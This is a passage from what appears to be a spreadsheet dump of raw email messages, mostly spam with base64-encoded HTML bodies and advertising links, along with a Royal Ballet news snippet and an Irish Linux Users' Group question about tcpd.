 NjZmZiI+wXC1uLlxuNwgOiCkaq30pGo8L2ZvbnQ+PC9iPjwvcD4gDQogICAgICAgICAgPHAgYWxp
 Z249InJpZ2h0Ij48Yj48Zm9udCBjb2xvcj0iI2NjNjZmZiI+pu2uYTwvZm9udD48L2I+PC9wPiAN
 CiAgICAgICAgPC90ZD4gDQogICAgICAgIDx0ZCBhbGlnbj0icmlnaHQiIGJvcmRlckNvbG9yTGln
 aHQ9IiM4MDgwODAiIGhlaWdodD0iMSIgd2lkdGg9IjczMyI+IA0KICAgICAgICAgIDxwIGFsaWdu
 PSJsZWZ0IiBzdHlsZT0iTElORS1IRUlHSFQ6IDE1MCU7IE1BUkdJTi1CT1RUT006IDNweDsgTUFS
 R0lOLVRPUDogM3B4Ij48Zm9udCBjb2xvcj0iI2ZmZmYwMCI+PGlucHV0IG5hbWU9IsFwtbi5cbjc
 LaXVpNEiIHNpemU9IjE0Ij48L2ZvbnQ+PGZvbnQgY29sb3I9IiNmZjAwMDAiPiilsrbxxOam7Ck8
 L2ZvbnQ+IA0KICAgICAgICAgIDxwIGFsaWduPSJsZWZ0IiBzdHlsZT0iTElORS1IRUlHSFQ6IDE1
 MCU7IE1BUkdJTi1CT1RUT006IDNweDsgTUFSR0lOLVRPUDogM3B4Ij48Zm9udCBjb2xvcj0iI2Zm
 ZmYwMCI+PGlucHV0IG5hbWU9IsFwtbi5cbjcLabtrmEiIHNpemU9IjE0Ij48L2ZvbnQ+PC9wPiAN
 CiAgICAgICAgPC90ZD4gDQogICAgICA8L3RyPiANCiAgICAgIDx0cj4gDQogICAgICAgIDx0ZCBh
 bGlnbj0icmlnaHQiIGJvcmRlckNvbG9yTGlnaHQ9IiM4MDgwODAiIGhlaWdodD0iMjQiIHdpZHRo
 PSI0ODQiPiANCiAgICAgICAgICA8cCBhbGlnbj0icmlnaHQiPjxiPjxmb250IGNvbG9yPSIjY2M2
 NmZmIj6mYad9PC9mb250PjwvYj48L3A+IA0KICAgICAgICA8L3RkPiANCiAgICAgICAgPHRkIGFs
 aWduPSJyaWdodCIgYm9yZGVyQ29sb3JMaWdodD0iIzgwODA4MCIgaGVpZ2h0PSIyNCIgd2lkdGg9
 IjczMyI+IA0KICAgICAgICAgIDxwIGFsaWduPSJsZWZ0Ij48Zm9udCBjb2xvcj0iI2ZmZmYwMCI+
 PGlucHV0IG5hbWU9IqZhp30iIHNpemU9IjQwIj48L2ZvbnQ+PGZvbnQgY29sb3I9IiNmZjAwMDAi
 PiilsrbxxOam7Ck8L2ZvbnQ+PC9wPiANCiAgICAgICAgPC90ZD4gDQogICAgICA8L3RyPiANCiAg
 ICAgIDx0cj4gDQogICAgICAgIDx0ZCBhbGlnbj0icmlnaHQiIGJvcmRlckNvbG9yTGlnaHQ9IiM4
 MDgwODAiIGhlaWdodD0iMSIgd2lkdGg9IjQ4NCI+IA0KICAgICAgICAgIDxwIGFsaWduPSJyaWdo
 dCI+PGI+PGZvbnQgY29sb3I9IiNjYzY2ZmYiPrPMpOirS62xvc2uybahPC9mb250PjwvYj48L3A+
 IA0KICAgICAgICA8L3RkPiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVyQ29sb3JM
 aWdodD0iIzgwODA4MCIgaGVpZ2h0PSIxIiB3aWR0aD0iNzMzIj4gDQogICAgICAgICAgPHAgYWxp
 Z249ImxlZnQiPjxmb250IGNvbG9yPSIjZmZmZjAwIj48c2VsZWN0IG5hbWU9IrPMpOirS62xvc2u
 ybahIiBzaXplPSIxIj4gDQogICAgICAgICAgICA8b3B0aW9uIHNlbGVjdGVkPr3Qv+++3Dwvb3B0
 aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+rFC0waRAPC9vcHRpb24+IA0KICAgICAgICAgICAg
 PG9wdGlvbj6sULTBpEc8L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0aW9uPqxQtMGkVDwvb3B0
 aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+rFC0waV8PC9vcHRpb24+IA0KICAgICAgICAgICAg
 PG9wdGlvbj6sULTBpK08L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0aW9uPrOjpWmlSDwvb3B0
 aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+sLKk6Twvb3B0aW9uPiANCiAgICAgICAgICA8L3Nl
 bGVjdD48L2ZvbnQ+PGI+PGZvbnQgY29sb3I9IiNjYzY2ZmYiIHNpemU9IjIiPrHfpFc3OjMwLTk6
 MDAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8L2ZvbnQ+PC9iPjwvcD4gDQogICAgICAgIDwvdGQ+
 IA0KICAgICAgPC90cj4gDQogICAgICA8dHI+IA0KICAgICAgICA8dGQgYWxpZ249InJpZ2h0IiBi
 b3JkZXJDb2xvckxpZ2h0PSIjODA4MDgwIiBoZWlnaHQ9IjEiIHdpZHRoPSI0ODQiPiANCiAgICAg
 ICAgICA8cCBhbGlnbj0icmlnaHQiPjxiPjxmb250IGNvbG9yPSIjY2M2NmZmIj6mfsTWPC9mb250
 PjwvYj48L3A+IA0KICAgICAgICA8L3RkPiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9y
 ZGVyQ29sb3JMaWdodD0iIzgwODA4MCIgaGVpZ2h0PSIxIiB3aWR0aD0iNzMzIj4gDQogICAgICAg
 ICAgPHAgYWxpZ249ImxlZnQiPjxmb250IGNvbG9yPSIjZmZmZjAwIj48aW5wdXQgbmFtZT0ipn7E
 1iIgc2l6ZT0iNCI+PC9mb250PjxiPjxmb250IGNvbG9yPSIjY2M2NmZmIiBzaXplPSIyIj63syi2
 tzE4t7OlSKRXKSZuYnNwOzwvZm9udD48L2I+PC9wPiANCiAgICAgICAgPC90ZD4gDQogICAgICA8
 L3RyPiANCiAgICAgIDx0cj4gDQogICAgICAgIDx0ZCBhbGlnbj0icmlnaHQiIGJvcmRlckNvbG9y
 TGlnaHQ9IiM4MDgwODAiIGhlaWdodD0iMSIgd2lkdGg9IjQ4NCI+PGI+PGZvbnQgY29sb3I9IiNj
 YzY2ZmYiPqnKp088L2ZvbnQ+PC9iPjwvdGQ+IA0KICAgICAgICA8dGQgYWxpZ249InJpZ2h0IiBi
 b3JkZXJDb2xvckxpZ2h0PSIjODA4MDgwIiBoZWlnaHQ9IjEiIHdpZHRoPSI3MzMiPiANCiAgICAg
 ICAgICA8cCBhbGlnbj0ibGVmdCI+PGZvbnQgY29sb3I9IiNmZmZmMDAiPjxzZWxlY3QgbmFtZT0i
 qcqnTyIgc2l6ZT0iMSI+IA0KICAgICAgICAgICAgPG9wdGlvbiBzZWxlY3RlZD690L/vvtw8L29w
 dGlvbj4gDQogICAgICAgICAgICA8b3B0aW9uPqhrPC9vcHRpb24+IA0KICAgICAgICAgICAgPG9w
 dGlvbj6kazwvb3B0aW9uPiANCiAgICAgICAgICA8L3NlbGVjdD4mbmJzcDsmbmJzcDs8L2ZvbnQ+
 PC9wPiANCiAgICAgICAgPC90ZD4gDQogICAgICA8L3RyPiANCiAgICAgIDx0cj4gDQogICAgICAg
 IDx0ZCBhbGlnbj0icmlnaHQiIGJvcmRlckNvbG9yTGlnaHQ9IiM4MDgwODAiIGhlaWdodD0iMSIg
 d2lkdGg9IjQ4NCI+IA0KICAgICAgICAgIDxwIGFsaWduPSJyaWdodCI+PGI+PGZvbnQgY29sb3I9
 IiNjYzY2ZmYiIHNpemU9IjMiPsK+t348L2ZvbnQ+PC9iPjwvcD4gDQogICAgICAgIDwvdGQ+IA0K
 ICAgICAgICA8dGQgYWxpZ249InJpZ2h0IiBib3JkZXJDb2xvckxpZ2h0PSIjODA4MDgwIiBoZWln
 aHQ9IjEiIHdpZHRoPSI3MzMiPiANCiAgICAgICAgICA8cCBhbGlnbj0ibGVmdCI+PGZvbnQgY29s
 b3I9IiNmZmZmMDAiPjxzZWxlY3QgbmFtZT0iwr63fiIgc2l6ZT0iMSI+IA0KICAgICAgICAgICAg
 PG9wdGlvbiBzZWxlY3RlZD690L/vvtw8L29wdGlvbj4NCiAgICAgICAgICAgIDxvcHRpb24+pLq2
 1KRXr1qx2jwvb3B0aW9uPg0KICAgICAgICAgICAgPG9wdGlvbj63frDIpua+UDwvb3B0aW9uPg0K
 ICAgICAgICAgICAgPG9wdGlvbj5TT0hPsdo8L29wdGlvbj4NCiAgICAgICAgICAgIDxvcHRpb24+
 ptukdrftptGqTzwvb3B0aW9uPg0KICAgICAgICAgICAgPG9wdGlvbj7Cvrd+sPykazwvb3B0aW9u
 Pg0KICAgICAgICAgICAgPG9wdGlvbj6uYa54pUSw/Dwvb3B0aW9uPg0KICAgICAgICAgICAgPG9w
 dGlvbj6r3bd+pKQ8L29wdGlvbj4NCiAgICAgICAgICAgIDxvcHRpb24+vselzTwvb3B0aW9uPg0K
 ICAgICAgICAgICAgPG9wdGlvbj6o5KVMPC9vcHRpb24+DQogICAgICAgICAgPC9zZWxlY3Q+Jm5i
 c3A7Jm5ic3A7Jm5ic3A7IDwvZm9udD48Yj48Zm9udCBjb2xvcj0iI2NjNjZmZiI+qOSlpjwvZm9u
 dD48L2I+PGZvbnQgY29sb3I9IiNmZmZmMDAiPiAgDQogICAgICAgICAgPGlucHV0IG5hbWU9IsK+
 t36o5KWmIiBzaXplPSIxNCI+PC9mb250PjwvcD4gDQogICAgICAgIDwvdGQ+IA0KICAgICAgPC90
 cj4gDQogICAgICA8dHI+IA0KICAgICAgICA8dGQgYWxpZ249InJpZ2h0IiBib3JkZXJDb2xvckxp
 Z2h0PSIjODA4MDgwIiBoZWlnaHQ9IjEiIHdpZHRoPSI0ODQiPiANCiAgICAgICAgICA8cCBhbGln
 bj0icmlnaHQiPjxiPjxmb250IGNvbG9yPSIjY2M2NmZmIiBzaXplPSIzIj6sUK55PC9mb250Pjwv
 Yj48L3A+IA0KICAgICAgICA8L3RkPiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVy
 Q29sb3JMaWdodD0iIzgwODA4MCIgaGVpZ2h0PSIxIiB3aWR0aD0iNzMzIj4gDQogICAgICAgICAg
 PHAgYWxpZ249ImxlZnQiPjxmb250IGNvbG9yPSIjZmZmZjAwIj48c2VsZWN0IG5hbWU9IqxQrnki
 IHNpemU9IjEiPiANCiAgICAgICAgICAgIDxvcHRpb24gc2VsZWN0ZWQ+vdC/777cPC9vcHRpb24+
 IA0KICAgICAgICAgICAgPG9wdGlvbj6oZKbPrnk8L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0
 aW9uPqr3pPuueTwvb3B0aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+wvmkbK55PC9vcHRpb24+
 IA0KICAgICAgICAgICAgPG9wdGlvbj6lqMPJrnk8L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0
 aW9uPrfgpGyueTwvb3B0aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+s0Kka655PC9vcHRpb24+
 IA0KICAgICAgICAgICAgPG9wdGlvbj6k0axprnk8L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0
 aW9uPqTRw8iueTwvb3B0aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+rmek4q55PC9vcHRpb24+
 IA0KICAgICAgICAgICAgPG9wdGlvbj68r71+rnk8L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0
 aW9uPqT0sn6ueTwvb3B0aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+wvmzva55PC9vcHRpb24+
 IA0KICAgICAgICAgIDwvc2VsZWN0PjwvZm9udD48L3A+IA0KICAgICAgICA8L3RkPiANCiAgICAg
 IDwvdHI+IA0KICAgICAgPHRyPiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVyQ29s
 b3JMaWdodD0iIzgwODA4MCIgaGVpZ2h0PSIxIiB3aWR0aD0iNDg0Ij4gDQogICAgICAgICAgPHAg
 YWxpZ249InJpZ2h0Ij48Yj48Zm9udCBjb2xvcj0iI2NjNjZmZiIgc2l6ZT0iMyI+sUKrw6qsqnA8
 L2ZvbnQ+PC9iPjwvcD4gDQogICAgICAgIDwvdGQ+IA0KICAgICAgICA8dGQgYWxpZ249InJpZ2h0
 IiBib3JkZXJDb2xvckxpZ2h0PSIjODA4MDgwIiBoZWlnaHQ9IjEiIHdpZHRoPSI3MzMiPiANCiAg
 ICAgICAgICA8cCBhbGlnbj0ibGVmdCI+PGZvbnQgY29sb3I9IiNmZmZmMDAiPjxzZWxlY3QgbmFt
 ZT0isUKrw6qsqnAiIHNpemU9IjEiPiANCiAgICAgICAgICAgIDxvcHRpb24gc2VsZWN0ZWQ+vdC/
 777cPC9vcHRpb24+IA0KICAgICAgICAgICAgPG9wdGlvbj6lvLFCPC9vcHRpb24+IA0KICAgICAg
 ICAgICAgPG9wdGlvbj6kd7FCPC9vcHRpb24+IA0KICAgICAgICAgIDwvc2VsZWN0PiZuYnNwOyZu
 YnNwOzwvZm9udD48L3A+IA0KICAgICAgICA8L3RkPiANCiAgICAgIDwvdHI+IA0KICAgICAgPHRy
 PiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVyQ29sb3JMaWdodD0iIzgwODA4MCIg
 aGVpZ2h0PSIxIiB3aWR0aD0iNDg0Ij4gDQogICAgICAgICAgPHAgYWxpZ249InJpZ2h0Ij48Yj48
 Zm9udCBjb2xvcj0iI2NjNjZmZiI+rd3CvrDKvvc8L2ZvbnQ+PC9iPjwvcD4gDQogICAgICAgIDwv
 dGQ+IA0KICAgICAgICA8dGQgYWxpZ249InJpZ2h0IiBib3JkZXJDb2xvckxpZ2h0PSIjODA4MDgw
 IiBoZWlnaHQ9IjEiIHdpZHRoPSI3MzMiPiANCiAgICAgICAgICA8cCBhbGlnbj0ibGVmdCI+PGZv
 bnQgY29sb3I9IiNmZmZmMDAiPjxzZWxlY3QgbmFtZT0ird2udLDKvvciIHNpemU9IjEiPiANCiAg
 ICAgICAgICAgIDxvcHRpb24gc2VsZWN0ZWQ+vdC/777cPC9vcHRpb24+IA0KICAgICAgICAgICAg
 PG9wdGlvbj6/+qSjsPelzjwvb3B0aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+vFelW7LEpEel
 96aspEo8L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0aW9uPrPQt3637abRqk88L29wdGlvbj4g
 DQogICAgICAgICAgICA8b3B0aW9uPrROrE+3UcHIv/o8L29wdGlvbj4gDQogICAgICAgICAgPC9z
 ZWxlY3Q+PC9mb250PjwvcD4gDQogICAgICAgIDwvdGQ+IA0KICAgICAgPC90cj4gDQogICAgICA8
 dHI+IA0KICAgICAgICA8dGQgYWxpZ249InJpZ2h0IiBib3JkZXJDb2xvckxpZ2h0PSIjODA4MDgw
 IiBoZWlnaHQ9IjEiIHdpZHRoPSI0ODQiPiANCiAgICAgICAgICA8cCBhbGlnbj0icmlnaHQiPjxi
 Pjxmb250IGNvbG9yPSIjY2M2NmZmIj6zzKToq0vBcLW4rsm2oTwvZm9udD48L2I+PC9wPiANCiAg
 ICAgICAgPC90ZD4gDQogICAgICAgIDx0ZCBhbGlnbj0icmlnaHQiIGJvcmRlckNvbG9yTGlnaHQ9
 IiM4MDgwODAiIGhlaWdodD0iMSIgd2lkdGg9IjczMyI+IA0KICAgICAgICAgIDxwIGFsaWduPSJs
 ZWZ0Ij48Zm9udCBjb2xvcj0iI2ZmZmYwMCI+PHNlbGVjdCBuYW1lPSKzzKToq0vBcLW4rsm2oS2s
 ULTBIiBzaXplPSIxIj4gDQogICAgICAgICAgICA8b3B0aW9uIHNlbGVjdGVkPr3Qv+++3Dwvb3B0
 aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+rFC0waRAPC9vcHRpb24+IA0KICAgICAgICAgICAg
 PG9wdGlvbj6sULTBpEc8L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0aW9uPqxQtMGkVDwvb3B0
 aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+rFC0waV8PC9vcHRpb24+IA0KICAgICAgICAgICAg
 PG9wdGlvbj6sULTBpK08L29wdGlvbj4gDQogICAgICAgICAgICA8b3B0aW9uPqxQtMGkuzwvb3B0
 aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+rFC0waTpPC9vcHRpb24+IA0KICAgICAgICAgICAg
 PG9wdGlvbj6zo6VppUg8L29wdGlvbj4gDQogICAgICAgICAgPC9zZWxlY3Q+PHNlbGVjdCBuYW1l
 PSKzzKToq0vBcLW4rsm2oS2uyaxxIiBzaXplPSIxIj4gDQogICAgICAgICAgICA8b3B0aW9uIHNl
 bGVjdGVkPr3Qv+++3Dwvb3B0aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+pFekyDktMTI8L29w
 dGlvbj4gDQogICAgICAgICAgICA8b3B0aW9uPqSkpMgxMi0xPC9vcHRpb24+IA0KICAgICAgICAg
 ICAgPG9wdGlvbj6kVaTIMS01PC9vcHRpb24+IA0KICAgICAgICAgICAgPG9wdGlvbj6x36RXOC0x
 MDwvb3B0aW9uPiANCiAgICAgICAgICAgIDxvcHRpb24+sd+kVzktMTE8L29wdGlvbj4gDQogICAg
 ICAgICAgICA8b3B0aW9uPrOjpWmlSDwvb3B0aW9uPiANCiAgICAgICAgICA8L3NlbGVjdD4mbmJz
 cDsmbmJzcDs8L2ZvbnQ+PC9wPiANCiAgICAgICAgPC90ZD4gDQogICAgICA8L3RyPiANCiAgICAg
 IDx0cj4gDQogICAgICAgIDx0ZCBhbGlnbj0icmlnaHQiIGJvcmRlckNvbG9yTGlnaHQ9IiM4MDgw
 ODAiIGhlaWdodD0iMTciIHdpZHRoPSI0ODQiPiANCiAgICAgICAgICA8cCBhbGlnbj0icmlnaHQi
 PjxiPjxmb250IGNvbG9yPSIjY2M2NmZmIj65caRstmyl8zwvZm9udD48L2I+PC9wPiANCiAgICAg
 ICAgPC90ZD4gDQogICAgICAgIDx0ZCBhbGlnbj0icmlnaHQiIGJvcmRlckNvbG9yTGlnaHQ9IiM4
 MDgwODAiIGhlaWdodD0iMTciIHdpZHRoPSI3MzMiPiANCiAgICAgICAgICA8cCBhbGlnbj0ibGVm
 dCI+PGZvbnQgY29sb3I9IiNmZmZmMDAiPjxpbnB1dCBuYW1lPSK5caRstmyl8yIgc2l6ZT0iNDAi
 PjwvZm9udD48L3A+IA0KICAgICAgICA8L3RkPiANCiAgICAgIDwvdHI+IA0KICAgICAgPHRyPiAN
 CiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVyQ29sb3JMaWdodD0iIzgwODA4MCIgaGVp
 Z2h0PSI0MyIgd2lkdGg9IjQ4NCI+PGI+PGZvbnQgY29sb3I9IiNjYzY2ZmYiPqvYxLOoxra1PC9m
 b250PjwvYj48L3RkPiANCiAgICAgICAgPHRkIGFsaWduPSJyaWdodCIgYm9yZGVyQ29sb3JMaWdo
 dD0iIzgwODA4MCIgaGVpZ2h0PSI0MyIgd2lkdGg9IjczMyI+IA0KICAgICAgICAgIDxwIGFsaWdu
 PSJsZWZ0Ij48Zm9udCBjb2xvcj0iI2ZmZmYwMCI+PGlucHV0IG5hbWU9IqvYxLOoxra1IiBzaXpl
 PSI0MCI+PC9mb250PjwvcD4gDQogICAgICAgIDwvdGQ+IA0KICAgICAgPC90cj4gDQogICAgPC90
 Ym9keT4gDQogIDwvdGFibGU+IA0KICA8cD48Zm9udCBzaXplPSIyIj6xernvqfM8Zm9udCBjb2xv
 cj0iI2ZmMDAwMCI+s3PC6rZXsNOoxrd+PC9mb250Pjxmb250IGNvbG9yPSIjMDAwMDAwIj6qurPQ
 t363TsRAPC9mb250PqFAPGlucHV0IG5hbWU9IqfaIiB0eXBlPSJjaGVja2JveCIgdmFsdWU9Iqvc
 prO/s73ssXGoxr/LqfQiPjxmb250IGNvbG9yPSIjMDAwMGZmIj6n2qvcprO/s73sICANCiAgoV3A
 daX9oV48L2ZvbnQ+oUA8aW5wdXQgbmFtZT0ip9oiIHR5cGU9ImNoZWNrYm94IiB2YWx1ZT0itXm3
 TMFBuNG/y6n0Ij48Zm9udCBjb2xvcj0iIzAwMDBmZiI+p9q1ebdMwUG40SAgDQogIDwvZm9udD6h
 QDxpbnB1dCBuYW1lPSKn2iIgdHlwZT0iY2hlY2tib3giIHZhbHVlPSKnuaX+pKPBQbjRv8up9CI+
 PGZvbnQgY29sb3I9IiMwMDAwZmYiPqfap7ml/qSjwUG40TwvZm9udD48L2ZvbnQ+PC9wPiANCiAg
 PHA+PGZvbnQgc2l6ZT0iMiI+sXqtbr/vvtym87rYpOimobZppuY8Zm9udCBjb2xvcj0iI2ZmMDAw
 MCI+s3PC6rZXsNOoxrd+PC9mb250PqFAICANCiAgPGlucHV0IG5hbWU9Ir/vvty5QqdApOimoSA/
 IiB0eXBlPSJjaGVja2JveCIgdmFsdWU9IrbHss6kSK/fIj48Zm9udCBjb2xvcj0iIzAwMDBmZiI+
 tseyzqTopqE8L2ZvbnQ+oUChQDxpbnB1dCBuYW1lPSK/777cuUKnQKTopqEgPyIgdHlwZT0iY2hl
 Y2tib3giIHZhbHVlPSK69Lj0t3OkSK/fIj48Zm9udCBjb2xvcj0iIzAwMDBmZiI+uvS49KTopqE8
 L2ZvbnQ+PC9mb250PjwvcD4gDQogIDxwPjxmb250IHNpemU9IjIiPrF6qEOk0aazorCh46KxpHCu
 yaRXuvSuybahpWmlSLlCp0A8Zm9udCBjb2xvcj0iI2ZmMDAwMCI+s3PC6rZXsNOoxrd+PC9mb250
 PqFAPGlucHV0IG5hbWU9Iqazrsm2oblCp0C69Lj0v8up9CA/IiB0eXBlPSJjaGVja2JveCIgdmFs
 dWU9IqfaprMiPjxmb250IGNvbG9yPSIjMDAwMGZmIj6n2qazPC9mb250PqFAoUA8aW5wdXQgbmFt
 ZT0iprOuybahuUKnQLr0uPS/y6n0ID8iIHR5cGU9ImNoZWNrYm94IiB2YWx1ZT0ip9qoU6azIj48
 Zm9udCBjb2xvcj0iIzAwMDBmZiI+p9qoU6azPC9mb250PjwvZm9udD48L3A+IA0KICA8cD48Zm9u
 dCBzaXplPSIyIj6xeqxPp1/EQLdOp0u2T7G1qPw8Zm9udCBjb2xvcj0iI2ZmMDAwMCI+uvS49Kbm
 vlCwqqTir1OwVjwvZm9udD6hQDxpbnB1dCBDSEVDS0VEIG5hbWU9IrG1qPy69Lj0r1OwVj8gIiB0
 eXBlPSJjaGVja2JveCIgdmFsdWU9IqfaxEC3TiI+PGZvbnQgY29sb3I9IiMwMDAwZmYiPqfaxEC3
 TjwvZm9udD6hQKFAPGlucHV0IG5hbWU9IrG1qPy69Lj0r1OwViA/IiB0eXBlPSJjaGVja2JveCIg
 dmFsdWU9IqfapKPEQLdOIj48Zm9udCBjb2xvcj0iIzAwMDBmZiI+p9qko8RAt048L2ZvbnQ+PC9m
 b250PjwvcD4gDQogIDxwIGFsaWduPSJsZWZ0Ij48Zm9udCBzaXplPSIyIj4mbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsm
 bmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJz
 cDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsg
 IA0KICAmbmJzcDsgPGlucHV0IG5hbWU9IiAgILBlICAgIKVYICAgIiB0eXBlPSJzdWJtaXQiIHZh
 bHVlPSIgICAgsGUgICAgIKVYICAgICAiPiZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZu
 YnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAgDQogIDxpbnB1
 dCBuYW1lPSJCMiIgdHlwZT0icmVzZXQiIHZhbHVlPSKtq7dzs12pdyI+PC9mb250PjwvcD4gDQog
 IDxwIGFsaWduPSJjZW50ZXIiPjxmb250IHNpemU9IjIiPq1ZpbuwVK6nq0SxeqnSuXe0waFBpmKm
 ubJgt1Cp6rpwXl48L2ZvbnQ+PC9wPg0KPHA+oUA8L3A+ICAgDQo8cCBhbGlnbj0iY2VudGVyIj6h
 QDwvcD4NCg0KPC9ib2R5Pg0KDQo8L2h0bWw+
 ------=_NextPart_9f5cBwKPXMZ2oYIRAA--
 ------=_NextPart_9f5cBwKPXMZ2oYIR--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You cannot do that!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;center&gt;&lt;a href=http://www.vitafactory.com/&gt;&lt;img src=http://www.vitafactory.com/images/vitafactory-mail-logo.jpg border=0&gt;&lt;hr&gt;&lt;a href=http://www.vitafactory.com/ad-saturday/1.html&gt;&lt;img src=http://www.vitafactory.com/ad-saturday/1.gif border=0&gt;&lt;/a&gt;&lt;hr&gt;&lt;br&gt;&lt;a href=http://www.vitafactory.com/ad-saturday/&gt;&lt;img src=http://www.vitafactory.com/ad-tuesday/joke1008.gif border=0&gt;&lt;hr&gt;&lt;a href=http://www.vitafactory.com/ad-saturday/2.html&gt;&lt;img src=http://www.vitafactory.com/ad-saturday/2.gif border=0&gt;&lt;/a&gt;&lt;hr&gt; &lt;/b&gt;&lt;p align=left&gt;&lt;br&gt;&lt;/font&gt;&lt;font color=#616161 face=Verdana size=1&gt;&lt;b&gt;Unsubscribe:&lt;/b&gt;&lt;br&gt;Please send a blank mail to:&lt;br&gt;unsub-56446664-9@william.monsterjoke.com&lt;br&gt;&lt;br&gt;&lt;a href=http://www.mach10.com/&gt;&lt;img src=http://www.vitafactory.com/images/mach10.gif border=0&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Troubled Royal Ballet eyes US director
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8535466,215/
 Date: 2002-10-04T02:38:59+01:00
 *Arts:* Kevin McKenzie last night emerged as the frontrunner to take over at 
 the scandal-hit Royal Ballet.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] tcpd
</t>
  </si>
  <si>
    <t xml:space="preserve">If I want to use tcpd for ftp and only one user will ever ftp but I dont
 know what IP that user is because its dialup DHCP how do I setup tcpd for
 that user?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: please see see kmuNnWq6p12tdpvINWVAGy
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_a4U4f4Lb5R29pMZQoWcLdBAFKn
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_a4U4f4Lb5R29pMZQoWcLdBAFKnAA"
 ------=_NextPart_a4U4f4Lb5R29pMZQoWcLdBAFKnAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGEgaHJlZj1odHRwOi8vaGxjLm5vLWlwLm9yZz4NCjxpbWcgc3JjPWh0dHA6Ly9ncm91cHMueWFo
 b28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9zbWFsbF9hMi5naWYgYWx0PWh0dHA6Ly9n
 cm91cHMueWFob28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9zbWFsbF9hMi5naWY+DQo8
 L2E+DQoNCjxhIGhyZWY9aHR0cHM6Ly9oYXBweS5yZWRpcmVjdG1lLm5ldC8+DQo8aW1nIHNyYz1o
 dHRwOi8vZ3JvdXBzLnlhaG9vLmNvbS9ncm91cC94aW54aW5yZW4vZmlsZXMvd2hfc21hbGxfYi5n
 aWYgYWx0PWh0dHA6Ly9ncm91cHMueWFob28uY29tL2dyb3VwL3hpbnhpbnJlbi9maWxlcy93aF9z
 bWFsbF9iLmdpZj4NCjwvYT4NCg0KPGEgaHJlZj1odHRwOi8vZm9yZXZlcnNwLmhvcHRvLm9yZy96
 aXJlYWw+DQo8aW1nIHNyYz1odHRwOi8vZ3JvdXBzLnlhaG9vLmNvbS9ncm91cC96aGVuc2hpMDEv
 ZmlsZXMvd29ybGRrbm93LmpwZyBhbHQ9aHR0cDovL2dyb3Vwcy55YWhvby5jb20vZ3JvdXAvemhl
 bnNoaTAxL2ZpbGVzL3dvcmxka25vdy5qcGc+DQo8L2E+DQoNCjxhIGhyZWY9aHR0cDovL3d3dy54
